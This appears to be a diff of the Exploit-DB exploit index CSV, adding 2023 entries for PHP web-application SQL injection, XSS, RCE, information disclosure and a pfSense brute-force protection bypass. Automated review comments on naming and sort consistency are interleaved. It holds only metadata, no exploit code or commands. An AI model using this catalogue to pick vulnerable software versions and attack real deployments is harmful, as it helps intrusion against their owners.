51233,exploits/php/webapps/51233.txt,"GLPI v10.0.2 - SQL Injection (Authentication Depends on Configuration)",2023-04-03,"Nuri Çilengir",webapps,php,,2023-04-03,2023-04-03,0,CVE-2022-31056,,,,, 51233,exploits/php/webapps/51233.txt,"GLPI v10.0.2 - SQL Injection (Authentication Depends on Configuration)",2023-04-03,"Nuri Çilengir",webapps,php,,2023-04-03,2023-04-03,0,CVE-2022-31056,,,,,
34758,exploits/php/webapps/34758.txt,"Glype 1.4.9 - Cookie Injection Directory Traversal Local File Inclusion",2014-09-24,Securify,webapps,php,80,2014-09-24,2014-09-24,0,OSVDB-111920;OSVDB-111919,,,,,http://www.securify.nl/advisory/SFY20140901/glype_proxy_cookie_jar_path_traversal_allows_code_execution.html 34758,exploits/php/webapps/34758.txt,"Glype 1.4.9 - Cookie Injection Directory Traversal Local File Inclusion",2014-09-24,Securify,webapps,php,80,2014-09-24,2014-09-24,0,OSVDB-111920;OSVDB-111919,,,,,http://www.securify.nl/advisory/SFY20140901/glype_proxy_cookie_jar_path_traversal_allows_code_execution.html
34759,exploits/php/webapps/34759.txt,"Glype 1.4.9 - Local Address Filter Bypass",2014-09-24,Securify,webapps,php,80,2014-09-24,2014-09-24,0,OSVDB-111921,,,,,http://www.securify.nl/advisory/SFY20140902/glype_proxy_local_address_filter_bypass.html 34759,exploits/php/webapps/34759.txt,"Glype 1.4.9 - Local Address Filter Bypass",2014-09-24,Securify,webapps,php,80,2014-09-24,2014-09-24,0,OSVDB-111921,,,,,http://www.securify.nl/advisory/SFY20140902/glype_proxy_local_address_filter_bypass.html
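Review bot: the row for 51231 ("GLPI v10.0.1 - Unauthenticated Sensitive Data Exposure", CVE-2022-31068) appears to be dropped from this position. The header counts go from 7 lines to 6, and it is the only row here without a counterpart on the new side. Nothing in this hunk shows where it goes, so confirm that the row is re-inserted elsewhere in the CSV in the same commit. Otherwise exploits/php/webapps/51231.txt is left without an index entry.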
@ -19576,6 +19590,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
42682,exploits/php/webapps/42682.txt,"ICGrocery 1.1 - 'key' SQL Injection",2017-09-13,"Ihsan Sencan",webapps,php,,2017-09-13,2017-09-13,0,,,,,, 42682,exploits/php/webapps/42682.txt,"ICGrocery 1.1 - 'key' SQL Injection",2017-09-13,"Ihsan Sencan",webapps,php,,2017-09-13,2017-09-13,0,,,,,,
42688,exploits/php/webapps/42688.txt,"ICHelpDesk 1.1 - 'pk' SQL Injection",2017-09-13,"Ihsan Sencan",webapps,php,,2017-09-13,2017-09-13,0,,,,,, 42688,exploits/php/webapps/42688.txt,"ICHelpDesk 1.1 - 'pk' SQL Injection",2017-09-13,"Ihsan Sencan",webapps,php,,2017-09-13,2017-09-13,0,,,,,,
42669,exploits/php/webapps/42669.txt,"ICHotelReservation 3.3 - 'key' SQL Injection",2017-09-13,"Ihsan Sencan",webapps,php,,2017-09-13,2017-09-13,0,,,,,, 42669,exploits/php/webapps/42669.txt,"ICHotelReservation 3.3 - 'key' SQL Injection",2017-09-13,"Ihsan Sencan",webapps,php,,2017-09-13,2017-09-13,0,,,,,,
51329,exploits/php/webapps/51329.py,"Icinga Web 2.10 - Arbitrary File Disclosure",2023-04-08,"Jacob Ebben",webapps,php,,2023-04-08,2023-04-08,0,CVE-2022-24716,,,,,
42679,exploits/php/webapps/42679.txt,"ICJewelry 1.1 - 'key' SQL Injection",2017-09-13,"Ihsan Sencan",webapps,php,,2017-09-13,2017-09-13,0,,,,,, 42679,exploits/php/webapps/42679.txt,"ICJewelry 1.1 - 'key' SQL Injection",2017-09-13,"Ihsan Sencan",webapps,php,,2017-09-13,2017-09-13,0,,,,,,
35547,exploits/php/webapps/35547.txt,"ICJobSite 1.1 - 'pid' SQL Injection",2011-03-30,RoAd_KiLlEr,webapps,php,,2011-03-30,2014-12-16,1,CVE-2011-1557;OSVDB-73408,,,,,https://www.securityfocus.com/bid/47100/info 35547,exploits/php/webapps/35547.txt,"ICJobSite 1.1 - 'pid' SQL Injection",2011-03-30,RoAd_KiLlEr,webapps,php,,2011-03-30,2014-12-16,1,CVE-2011-1557;OSVDB-73408,,,,,https://www.securityfocus.com/bid/47100/info
42667,exploits/php/webapps/42667.txt,"ICLowBidAuction 3.3 - SQL Injection",2017-09-13,"Ihsan Sencan",webapps,php,,2017-09-13,2017-09-13,0,,,,,, 42667,exploits/php/webapps/42667.txt,"ICLowBidAuction 3.3 - SQL Injection",2017-09-13,"Ihsan Sencan",webapps,php,,2017-09-13,2017-09-13,0,,,,,,
@ -21771,6 +21786,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
16906,exploits/php/webapps/16906.rb,"Joomla! Plugin tinybrowser 1.5.12 - Arbitrary File Upload / Code Execution (Metasploit)",2010-06-15,Metasploit,webapps,php,,2010-06-15,2016-11-04,1,OSVDB-64578,"Metasploit Framework (MSF)",,,, 16906,exploits/php/webapps/16906.rb,"Joomla! Plugin tinybrowser 1.5.12 - Arbitrary File Upload / Code Execution (Metasploit)",2010-06-15,Metasploit,webapps,php,,2010-06-15,2016-11-04,1,OSVDB-64578,"Metasploit Framework (MSF)",,,,
9926,exploits/php/webapps/9926.rb,"Joomla! Plugin tinybrowser 1.5.12 - Arbitrary File Upload / Execution",2009-07-22,spinbad,webapps,php,,2009-07-21,,1,OSVDB-64578;CVE-2011-4908,,,,, 9926,exploits/php/webapps/9926.rb,"Joomla! Plugin tinybrowser 1.5.12 - Arbitrary File Upload / Execution",2009-07-22,spinbad,webapps,php,,2009-07-21,,1,OSVDB-64578;CVE-2011-4908,,,,,
48518,exploits/php/webapps/48518.txt,"Joomla! Plugin XCloner Backup 3.5.3 - Local File Inclusion (Authenticated)",2020-05-26,"Mehmet Kelepçe",webapps,php,,2020-05-26,2020-05-26,0,,,,,, 48518,exploits/php/webapps/48518.txt,"Joomla! Plugin XCloner Backup 3.5.3 - Local File Inclusion (Authenticated)",2020-05-26,"Mehmet Kelepçe",webapps,php,,2020-05-26,2020-05-26,0,,,,,,
51334,exploits/php/webapps/51334.py,"Joomla! v4.2.8 - Unauthenticated information disclosure",2023-04-08,"Alexandre ZANNI",webapps,php,,2023-04-08,2023-04-08,0,CVE-2023-23752,,,,,
37714,exploits/php/webapps/37714.txt,"JoomShopping - Blind SQL Injection",2015-07-29,Mormoroth,webapps,php,80,2015-08-08,2015-08-08,1,OSVDB-126309,,,,, 37714,exploits/php/webapps/37714.txt,"JoomShopping - Blind SQL Injection",2015-07-29,Mormoroth,webapps,php,80,2015-08-08,2015-08-08,1,OSVDB-126309,,,,,
35667,exploits/php/webapps/35667.txt,"Joostina (Multiple Components) - SQL Injection",2011-04-27,KedAns-Dz,webapps,php,,2011-04-27,2015-01-01,1,,,,,,https://www.securityfocus.com/bid/47595/info 35667,exploits/php/webapps/35667.txt,"Joostina (Multiple Components) - SQL Injection",2011-04-27,KedAns-Dz,webapps,php,,2011-04-27,2015-01-01,1,,,,,,https://www.securityfocus.com/bid/47595/info
35187,exploits/php/webapps/35187.txt,"Joostina 1.3 - 'index.php' Cross-Site Scripting",2011-01-08,MustLive,webapps,php,,2011-01-08,2014-11-07,1,,,,,,https://www.securityfocus.com/bid/45732/info 35187,exploits/php/webapps/35187.txt,"Joostina 1.3 - 'index.php' Cross-Site Scripting",2011-01-08,MustLive,webapps,php,,2011-01-08,2014-11-07,1,,,,,,https://www.securityfocus.com/bid/45732/info
@ -22974,6 +22990,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
49138,exploits/php/webapps/49138.txt,"Medical Center Portal Management System 1.0 - 'login' SQL Injection",2020-12-01,"Aydın Baran Ertemir",webapps,php,,2020-12-01,2020-12-01,0,,,,,, 49138,exploits/php/webapps/49138.txt,"Medical Center Portal Management System 1.0 - 'login' SQL Injection",2020-12-01,"Aydın Baran Ertemir",webapps,php,,2020-12-01,2020-12-01,0,,,,,,
49236,exploits/php/webapps/49236.txt,"Medical Center Portal Management System 1.0 - Multiple Stored XSS",2020-12-11,"Saeed Bala Ahmed",webapps,php,,2020-12-11,2020-12-11,0,,,,,, 49236,exploits/php/webapps/49236.txt,"Medical Center Portal Management System 1.0 - Multiple Stored XSS",2020-12-11,"Saeed Bala Ahmed",webapps,php,,2020-12-11,2020-12-11,0,,,,,,
41091,exploits/php/webapps/41091.txt,"Medical Clinic Website Script - SQL Injection",2017-01-18,"Ihsan Sencan",webapps,php,,2017-01-18,2017-01-18,0,,,,,, 41091,exploits/php/webapps/41091.txt,"Medical Clinic Website Script - SQL Injection",2017-01-18,"Ihsan Sencan",webapps,php,,2017-01-18,2017-01-18,0,,,,,,
51338,exploits/php/webapps/51338.txt,"Medicine Tracker System v1.0 - Sql Injection",2023-04-08,"Sanjay Singh",webapps,php,,2023-04-08,2023-04-08,0,,,,,,
18202,exploits/php/webapps/18202.txt,"Meditate Web Content Editor 'username_input' - SQL Injection",2011-12-05,"Stefan Schurtz",webapps,php,,2011-12-05,2011-12-05,0,OSVDB-77491,,,,,http://secunia.com/advisories/47010/ 18202,exploits/php/webapps/18202.txt,"Meditate Web Content Editor 'username_input' - SQL Injection",2011-12-05,"Stefan Schurtz",webapps,php,,2011-12-05,2011-12-05,0,OSVDB-77491,,,,,http://secunia.com/advisories/47010/
46592,exploits/php/webapps/46592.txt,"Meeplace Business Review Script - 'id' SQL Injection",2019-03-22,"Ahmet Ümit BAYRAM",webapps,php,80,2019-03-22,2019-03-22,0,,"SQL Injection (SQLi)",,,, 46592,exploits/php/webapps/46592.txt,"Meeplace Business Review Script - 'id' SQL Injection",2019-03-22,"Ahmet Ümit BAYRAM",webapps,php,80,2019-03-22,2019-03-22,0,,"SQL Injection (SQLi)",,,,
32232,exploits/php/webapps/32232.txt,"Meet#Web 0.8 - 'ManagerResource.class.php?root_path' Remote File Inclusion",2008-08-13,"Rakesh S",webapps,php,,2008-08-13,2014-03-13,1,CVE-2008-6066;OSVDB-51773,,,,,https://www.securityfocus.com/bid/30673/info 32232,exploits/php/webapps/32232.txt,"Meet#Web 0.8 - 'ManagerResource.class.php?root_path' Remote File Inclusion",2008-08-13,"Rakesh S",webapps,php,,2008-08-13,2014-03-13,1,CVE-2008-6066;OSVDB-51773,,,,,https://www.securityfocus.com/bid/30673/info
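Review bot: the description on the new row 51338 spells the class as "Sql Injection", while every other row in this hunk uses "SQL Injection", so a case-sensitive search of the index will miss it. Suggest "Medicine Tracker System 1.0 - SQL Injection". The tags column is also empty, where 46592 a few rows down carries "SQL Injection (SQLi)". The title does not name the affected parameter either, unlike 49138 ('login') and 46592 ('id').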
@ -24502,6 +24519,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
48444,exploits/php/webapps/48444.txt,"Online AgroCulture Farm Management System 1.0 - 'uname' SQL Injection",2020-05-11,"Tarun Sehgal",webapps,php,,2020-05-11,2020-05-11,0,,,,,, 48444,exploits/php/webapps/48444.txt,"Online AgroCulture Farm Management System 1.0 - 'uname' SQL Injection",2020-05-11,"Tarun Sehgal",webapps,php,,2020-05-11,2020-05-11,0,,,,,,
39167,exploits/php/webapps/39167.txt,"Online Airline Booking System - Multiple Vulnerabilities",2016-01-05,"Manish Tanwar",webapps,php,80,2016-01-05,2016-01-05,0,OSVDB-132611;OSVDB-132610,,,,http://www.exploit-db.comOABSv1.7.zip, 39167,exploits/php/webapps/39167.txt,"Online Airline Booking System - Multiple Vulnerabilities",2016-01-05,"Manish Tanwar",webapps,php,80,2016-01-05,2016-01-05,0,OSVDB-132611;OSVDB-132610,,,,http://www.exploit-db.comOABSv1.7.zip,
47366,exploits/php/webapps/47366.txt,"Online Appointment - SQL Injection",2019-09-09,"mohammad zaheri",webapps,php,80,2019-09-09,2019-09-10,0,,"SQL Injection (SQLi)",,,, 47366,exploits/php/webapps/47366.txt,"Online Appointment - SQL Injection",2019-09-09,"mohammad zaheri",webapps,php,80,2019-09-09,2019-09-10,0,,"SQL Injection (SQLi)",,,,
51337,exploits/php/webapps/51337.txt,"Online Appointment System V1.0 - Cross-Site Scripting (XSS)",2023-04-08,"Sanjay Singh",webapps,php,,2023-04-08,2023-04-08,0,,,,,,
50089,exploits/php/webapps/50089.txt,"Online Birth Certificate System 1.1 - 'Multiple' Stored Cross-Site Scripting (XSS)",2021-07-05,"Subhadip Nag",webapps,php,,2021-07-05,2021-07-05,0,,,,,, 50089,exploits/php/webapps/50089.txt,"Online Birth Certificate System 1.1 - 'Multiple' Stored Cross-Site Scripting (XSS)",2021-07-05,"Subhadip Nag",webapps,php,,2021-07-05,2021-07-05,0,,,,,,
47922,exploits/php/webapps/47922.txt,"Online Book Store 1.0 - 'bookisbn' SQL Injection",2020-01-15,"Ertebat Gostar Co",webapps,php,,2020-01-15,2020-01-15,0,,,,,, 47922,exploits/php/webapps/47922.txt,"Online Book Store 1.0 - 'bookisbn' SQL Injection",2020-01-15,"Ertebat Gostar Co",webapps,php,,2020-01-15,2020-01-15,0,,,,,,
48775,exploits/php/webapps/48775.txt,"Online Book Store 1.0 - 'id' SQL Injection",2020-08-31,"Moaaz Taha",webapps,php,,2020-08-31,2020-08-31,0,,,,,, 48775,exploits/php/webapps/48775.txt,"Online Book Store 1.0 - 'id' SQL Injection",2020-08-31,"Moaaz Taha",webapps,php,,2020-08-31,2020-08-31,0,,,,,,
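Review bot: the new row 51337 introduces "Online Appointment System V1.0" directly below the existing 47366 "Online Appointment - SQL Injection". Is this the same product under a second name? If so, align the product string so both entries group together in searches. The capital "V1.0" also differs from the bare "1.0" / "1.1" used by the Online Book Store and Online Birth Certificate System rows in this hunk, and the title does not say whether the XSS is stored or reflected, which 50089 does.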
@ -24670,6 +24688,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
34951,exploits/php/webapps/34951.txt,"Online Work Order Suite - Login SQL Injection",2010-11-02,VSN,webapps,php,,2010-11-02,2014-10-13,1,CVE-2010-4186;OSVDB-68972,,,,,https://www.securityfocus.com/bid/44608/info 34951,exploits/php/webapps/34951.txt,"Online Work Order Suite - Login SQL Injection",2010-11-02,VSN,webapps,php,,2010-11-02,2014-10-13,1,CVE-2010-4186;OSVDB-68972,,,,,https://www.securityfocus.com/bid/44608/info
48560,exploits/php/webapps/48560.py,"Online-Exam-System 2015 - 'feedback' SQL Injection",2020-06-05,"Gus Ralph",webapps,php,,2020-06-05,2020-06-05,0,,,,,, 48560,exploits/php/webapps/48560.py,"Online-Exam-System 2015 - 'feedback' SQL Injection",2020-06-05,"Gus Ralph",webapps,php,,2020-06-05,2020-06-05,0,,,,,,
48529,exploits/php/webapps/48529.txt,"Online-Exam-System 2015 - 'fid' SQL Injection",2020-05-28,"Berk Dusunur",webapps,php,,2020-05-28,2020-05-28,0,,,,,, 48529,exploits/php/webapps/48529.txt,"Online-Exam-System 2015 - 'fid' SQL Injection",2020-05-28,"Berk Dusunur",webapps,php,,2020-05-28,2020-05-28,0,,,,,,
51344,exploits/php/webapps/51344.txt,"Online-Pizza-Ordering -1.0 - Remote Code Execution (RCE)",2023-04-08,nu11secur1ty,webapps,php,,2023-04-08,2023-04-08,0,,,,,,
29264,exploits/php/webapps/29264.txt,"Onpub CMS 1.4/1.5 - Multiple SQL Injections",2013-10-28,Vulnerability-Lab,webapps,php,,2013-10-29,2013-10-29,0,OSVDB-99014;OSVDB-99013,,,,,https://www.vulnerability-lab.com/get_content.php?id=1120 29264,exploits/php/webapps/29264.txt,"Onpub CMS 1.4/1.5 - Multiple SQL Injections",2013-10-28,Vulnerability-Lab,webapps,php,,2013-10-29,2013-10-29,0,OSVDB-99014;OSVDB-99013,,,,,https://www.vulnerability-lab.com/get_content.php?id=1120
34469,exploits/php/webapps/34469.html,"Onyx - Multiple Cross-Site Scripting Vulnerabilities",2010-08-10,"High-Tech Bridge SA",webapps,php,,2010-08-10,2014-08-30,1,,,,,,https://www.securityfocus.com/bid/42446/info 34469,exploits/php/webapps/34469.html,"Onyx - Multiple Cross-Site Scripting Vulnerabilities",2010-08-10,"High-Tech Bridge SA",webapps,php,,2010-08-10,2014-08-30,1,,,,,,https://www.securityfocus.com/bid/42446/info
25158,exploits/php/webapps/25158.txt,"OOApp Guestbook - Multiple HTML Injection Vulnerabilities",2005-02-24,m1o1d1,webapps,php,,2005-02-24,2013-05-02,1,,,,,,https://www.securityfocus.com/bid/12647/info 25158,exploits/php/webapps/25158.txt,"OOApp Guestbook - Multiple HTML Injection Vulnerabilities",2005-02-24,m1o1d1,webapps,php,,2005-02-24,2013-05-02,1,,,,,,https://www.securityfocus.com/bid/12647/info
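Review bot: the version in the new row 51344 is written "Online-Pizza-Ordering -1.0", with a hyphen fused to the number, so it reads as a negative version and breaks the "Product Version - Class" pattern that the Online-Exam-System rows above it follow. Suggest "Online-Pizza-Ordering 1.0 - Remote Code Execution (RCE)". The title also does not say whether authentication is required, which matters for triage of an RCE entry.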
@ -25478,6 +25497,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
39709,exploits/php/webapps/39709.txt,"pfSense Community Edition 2.2.6 - Multiple Vulnerabilities",2016-04-18,Security-Assessment.com,webapps,php,443,2016-04-18,2016-04-18,0,,,,,http://www.exploit-db.compfSense-LiveCD-2.2.6-RELEASE-i386.iso.gz,http://www.security-assessment.com/files/documents/advisory/pfsenseAdvisory.pdf 39709,exploits/php/webapps/39709.txt,"pfSense Community Edition 2.2.6 - Multiple Vulnerabilities",2016-04-18,Security-Assessment.com,webapps,php,443,2016-04-18,2016-04-18,0,,,,,http://www.exploit-db.compfSense-LiveCD-2.2.6-RELEASE-i386.iso.gz,http://www.security-assessment.com/files/documents/advisory/pfsenseAdvisory.pdf
39306,exploits/php/webapps/39306.html,"pfSense Firewall 2.2.5 - Config File Cross-Site Request Forgery",2016-01-25,"Aatif Shahdad",webapps,php,443,2016-01-25,2016-04-14,0,OSVDB-132268,,,,http://www.exploit-db.compfsense-RELENG_2_2_5.tar.gz, 39306,exploits/php/webapps/39306.html,"pfSense Firewall 2.2.5 - Config File Cross-Site Request Forgery",2016-01-25,"Aatif Shahdad",webapps,php,443,2016-01-25,2016-04-14,0,OSVDB-132268,,,,http://www.exploit-db.compfsense-RELENG_2_2_5.tar.gz,
39695,exploits/php/webapps/39695.txt,"pfSense Firewall 2.2.6 - Services Cross-Site Request Forgery",2016-04-14,"Aatif Shahdad",webapps,php,443,2016-04-14,2016-04-14,0,,,,,http://www.exploit-db.compfSense-LiveCD-2.2.5-RELEASE-i386.iso.gz, 39695,exploits/php/webapps/39695.txt,"pfSense Firewall 2.2.6 - Services Cross-Site Request Forgery",2016-04-14,"Aatif Shahdad",webapps,php,443,2016-04-14,2016-04-14,0,,,,,http://www.exploit-db.compfSense-LiveCD-2.2.5-RELEASE-i386.iso.gz,
51352,exploits/php/webapps/51352.py,"pfsenseCE v2.6.0 - Anti-brute force protection bypass",2023-04-08,FabDotNET,webapps,php,,2023-04-08,2023-04-08,0,CVE-2023-27100,,,,,
43090,exploits/php/webapps/43090.txt,"PG All Share Video 1.0 - SQL Injection",2017-10-30,"Ihsan Sencan",webapps,php,,2017-10-30,2017-10-30,0,CVE-2017-15969,,,,, 43090,exploits/php/webapps/43090.txt,"PG All Share Video 1.0 - SQL Injection",2017-10-30,"Ihsan Sencan",webapps,php,,2017-10-30,2017-10-30,0,CVE-2017-15969,,,,,
22373,exploits/php/webapps/22373.txt,"PG Dating Pro CMS 1.0 - Multiple Vulnerabilities",2012-10-31,Vulnerability-Lab,webapps,php,,2012-10-31,2012-10-31,0,OSVDB-86857;OSVDB-86856;OSVDB-86855,,,,,https://www.vulnerability-lab.com/get_content.php?id=736 22373,exploits/php/webapps/22373.txt,"PG Dating Pro CMS 1.0 - Multiple Vulnerabilities",2012-10-31,Vulnerability-Lab,webapps,php,,2012-10-31,2012-10-31,0,OSVDB-86857;OSVDB-86856;OSVDB-86855,,,,,https://www.vulnerability-lab.com/get_content.php?id=736
17531,exploits/php/webapps/17531.txt,"PG eLms Pro vDEC_2007_01 - 'contact_us.php' Multiple POST Cross-Site Scripting Vulnerabilities",2011-07-14,LiquidWorm,webapps,php,,2011-07-14,2011-07-14,0,,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5027.php 17531,exploits/php/webapps/17531.txt,"PG eLms Pro vDEC_2007_01 - 'contact_us.php' Multiple POST Cross-Site Scripting Vulnerabilities",2011-07-14,LiquidWorm,webapps,php,,2011-07-14,2011-07-14,0,,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5027.php
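Review bot: the product string "pfsenseCE" on the new row 51352 does not match the existing rows in this hunk, which use "pfSense Community Edition" (39709) and "pfSense Firewall" (39306, 39695). Anyone filtering the index on "pfSense Community Edition" will not find the CVE-2023-27100 entry. Suggest "pfSense Community Edition 2.6.0 - Anti-Brute Force Protection Bypass". The port column is also empty, while the three existing pfSense rows record 443.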
@ -28501,6 +28521,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
43297,exploits/php/webapps/43297.txt,"Responsive Realestate Script 3.2 - 'property-list?tbud' SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,80,2017-12-11,2018-11-20,1,CVE-2017-17628,"SQL Injection (SQLi)",,,, 43297,exploits/php/webapps/43297.txt,"Responsive Realestate Script 3.2 - 'property-list?tbud' SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,80,2017-12-11,2018-11-20,1,CVE-2017-17628,"SQL Injection (SQLi)",,,,
50049,exploits/php/webapps/50049.py,"Responsive Tourism Website 3.1 - Remote Code Execution (RCE) (Unauthenticated)",2021-06-22,Tagoletta,webapps,php,,2021-06-22,2021-06-22,0,,,,,, 50049,exploits/php/webapps/50049.py,"Responsive Tourism Website 3.1 - Remote Code Execution (RCE) (Unauthenticated)",2021-06-22,Tagoletta,webapps,php,,2021-06-22,2021-06-22,0,,,,,,
47205,exploits/php/webapps/47205.txt,"Rest - Cafe and Restaurant Website CMS - 'slug' SQL Injection",2019-08-02,n1x_,webapps,php,80,2019-08-02,2019-08-02,0,,"SQL Injection (SQLi)",,,, 47205,exploits/php/webapps/47205.txt,"Rest - Cafe and Restaurant Website CMS - 'slug' SQL Injection",2019-08-02,n1x_,webapps,php,80,2019-08-02,2019-08-02,0,,"SQL Injection (SQLi)",,,,
51330,exploits/php/webapps/51330.txt,"Restaurant Management System 1.0 - SQL Injection",2023-04-08,calfcrusher,webapps,php,,2023-04-08,2023-04-08,0,,,,,,
47520,exploits/php/webapps/47520.py,"Restaurant Management System 1.0 - Remote Code Execution",2019-10-17,"Ibad Shah",webapps,php,,2019-10-17,2019-10-17,0,,,,,, 47520,exploits/php/webapps/47520.py,"Restaurant Management System 1.0 - Remote Code Execution",2019-10-17,"Ibad Shah",webapps,php,,2019-10-17,2019-10-17,0,,,,,,
48885,exploits/php/webapps/48885.txt,"Restaurant Reservation System 1.0 - 'date' SQL Injection (Authenticated)",2020-10-16,b1nary,webapps,php,,2020-10-16,2020-10-16,0,,,,,, 48885,exploits/php/webapps/48885.txt,"Restaurant Reservation System 1.0 - 'date' SQL Injection (Authenticated)",2020-10-16,b1nary,webapps,php,,2020-10-16,2020-10-16,0,,,,,,
34760,exploits/php/webapps/34760.txt,"Restaurant Script (PizzaInn Project) - Persistent Cross-Site Scripting",2014-09-24,"Kenneth F. Belva",webapps,php,80,2014-09-24,2014-09-24,0,CVE-2014-6619;OSVDB-112019,,,,http://www.exploit-db.comRSv1.0.0.zip, 34760,exploits/php/webapps/34760.txt,"Restaurant Script (PizzaInn Project) - Persistent Cross-Site Scripting",2014-09-24,"Kenneth F. Belva",webapps,php,80,2014-09-24,2014-09-24,0,CVE-2014-6619;OSVDB-112019,,,,http://www.exploit-db.comRSv1.0.0.zip,
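Review bot: the new row 51330 is inserted ahead of 47520, but "Restaurant Management System 1.0 - SQL Injection" sorts after "Restaurant Management System 1.0 - Remote Code Execution" under the description ordering that the other rows in this hunk follow. If the placement comes from stray whitespace in the stored description, normalise it. Otherwise, move the row below 47520. The row also lacks the "SQL Injection (SQLi)" tag that 47205 carries, and names no parameter.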
@ -31981,6 +32002,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
11883,exploits/php/webapps/11883.txt,"WebsiteBaker 2.8.1 - DataBase Backup Disclosure",2010-03-25,Tr0y-x,webapps,php,,2010-03-24,,1,,,,,, 11883,exploits/php/webapps/11883.txt,"WebsiteBaker 2.8.1 - DataBase Backup Disclosure",2010-03-25,Tr0y-x,webapps,php,,2010-03-24,,1,,,,,,
35277,exploits/php/webapps/35277.txt,"WebsiteBaker 2.8.3 - Multiple Vulnerabilities",2014-11-17,"Manuel García Cárdenas",webapps,php,80,2014-11-17,2014-11-17,0,OSVDB-114748;OSVDB-114747;OSVDB-114746;OSVDB-114745;OSVDB-114744;OSVDB-114743;OSVDB-114742;OSVDB-114741;CVE-2014-9243;CVE-2014-9242,,,,http://www.exploit-db.comwb283-sp3.tar.gz, 35277,exploits/php/webapps/35277.txt,"WebsiteBaker 2.8.3 - Multiple Vulnerabilities",2014-11-17,"Manuel García Cárdenas",webapps,php,80,2014-11-17,2014-11-17,0,OSVDB-114748;OSVDB-114747;OSVDB-114746;OSVDB-114745;OSVDB-114744;OSVDB-114743;OSVDB-114742;OSVDB-114741;CVE-2014-9243;CVE-2014-9242,,,,http://www.exploit-db.comwb283-sp3.tar.gz,
23993,exploits/php/webapps/23993.txt,"WebsiteBaker Addon Concert Calendar 2.1.4 - Multiple Vulnerabilities",2013-01-09,"Stefan Schurtz",webapps,php,,2013-01-09,2013-01-09,1,OSVDB-89046;OSVDB-89045,,,,http://www.exploit-db.comconcertcalendar-v2.2.zip,http://www.darksecurity.de/advisories/2012/SSCHADV2012-022.txt 23993,exploits/php/webapps/23993.txt,"WebsiteBaker Addon Concert Calendar 2.1.4 - Multiple Vulnerabilities",2013-01-09,"Stefan Schurtz",webapps,php,,2013-01-09,2013-01-09,1,OSVDB-89046;OSVDB-89045,,,,http://www.exploit-db.comconcertcalendar-v2.2.zip,http://www.darksecurity.de/advisories/2012/SSCHADV2012-022.txt
51349,exploits/php/webapps/51349.txt,"WebsiteBaker v2.13.3 - Cross-Site Scripting (XSS)",2023-04-08,"Mirabbas Ağalarov",webapps,php,,2023-04-08,2023-04-08,0,,,,,,
34541,exploits/php/webapps/34541.txt,"WebsiteKit Gbplus - 'Name' / 'Body' HTML Injection",2010-08-29,MiND,webapps,php,,2010-08-29,2014-09-06,1,,,,,,https://www.securityfocus.com/bid/42842/info 34541,exploits/php/webapps/34541.txt,"WebsiteKit Gbplus - 'Name' / 'Body' HTML Injection",2010-08-29,MiND,webapps,php,,2010-08-29,2014-09-06,1,,,,,,https://www.securityfocus.com/bid/42842/info
44686,exploits/php/webapps/44686.txt,"WebSocket Live Chat - Cross-Site Scripting",2018-05-22,"Alireza Norkazemi",webapps,php,,2018-05-22,2018-05-22,0,,,,,, 44686,exploits/php/webapps/44686.txt,"WebSocket Live Chat - Cross-Site Scripting",2018-05-22,"Alireza Norkazemi",webapps,php,,2018-05-22,2018-05-22,0,,,,,,
7653,exploits/php/webapps/7653.txt,"webSPELL 4 - Authentication Bypass",2009-01-03,anonymous,webapps,php,,2009-01-02,2017-01-11,1,,,,,, 7653,exploits/php/webapps/7653.txt,"webSPELL 4 - Authentication Bypass",2009-01-03,anonymous,webapps,php,,2009-01-02,2017-01-11,1,,,,,,
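Review bot: the new row 51349 writes the version as "v2.13.3", while the existing rows for the same product in this hunk use a bare version ("WebsiteBaker 2.8.1", "WebsiteBaker 2.8.3"), so version-based matching against the product string will treat it differently. Suggest "WebsiteBaker 2.13.3 - ...". The description also gives only "Cross-Site Scripting (XSS)", with no indication of stored versus reflected or of the affected field, which makes the entry hard to tell apart from any later XSS submission for this release.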
@ -33673,6 +33695,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
7074,exploits/php/webapps/7074.txt,"X10media Mp3 Search Engine 1.6 - Remote File Disclosure",2008-11-09,THUNDER,webapps,php,,2008-11-08,,1,OSVDB-49797;CVE-2008-6960,,,,, 7074,exploits/php/webapps/7074.txt,"X10media Mp3 Search Engine 1.6 - Remote File Disclosure",2008-11-09,THUNDER,webapps,php,,2008-11-08,,1,OSVDB-49797;CVE-2008-6960,,,,,
8408,exploits/php/webapps/8408.txt,"X10media Mp3 Search Engine < 1.6.2 - Admin Access",2009-04-13,THUNDER,webapps,php,,2009-04-12,2017-01-02,1,,,,,, 8408,exploits/php/webapps/8408.txt,"X10media Mp3 Search Engine < 1.6.2 - Admin Access",2009-04-13,THUNDER,webapps,php,,2009-04-12,2017-01-02,1,,,,,,
28557,exploits/php/webapps/28557.txt,"X2CRM 3.4.1 - Multiple Vulnerabilities",2013-09-25,"High-Tech Bridge SA",webapps,php,80,2013-09-25,2013-09-25,0,CVE-2013-5693;CVE-2013-5692;OSVDB-97366;OSVDB-97365,,,,,https://www.htbridge.com/advisory/HTB23172 28557,exploits/php/webapps/28557.txt,"X2CRM 3.4.1 - Multiple Vulnerabilities",2013-09-25,"High-Tech Bridge SA",webapps,php,80,2013-09-25,2013-09-25,0,CVE-2013-5693;CVE-2013-5692;OSVDB-97366;OSVDB-97365,,,,,https://www.htbridge.com/advisory/HTB23172
51346,exploits/php/webapps/51346.txt,"X2CRM v6.6/6.9 - Reflected Cross-Site Scripting (XSS) (Authenticated)",2023-04-08,"Betul Denizler",webapps,php,,2023-04-08,2023-04-08,0,CVE-2022-48177,,,,,
51345,exploits/php/webapps/51345.txt,"X2CRM v6.6/6.9 - Stored Cross-Site Scripting (XSS) (Authenticated)",2023-04-08,"Betul Denizler",webapps,php,,2023-04-08,2023-04-08,0,CVE-2022-48178,,,,,
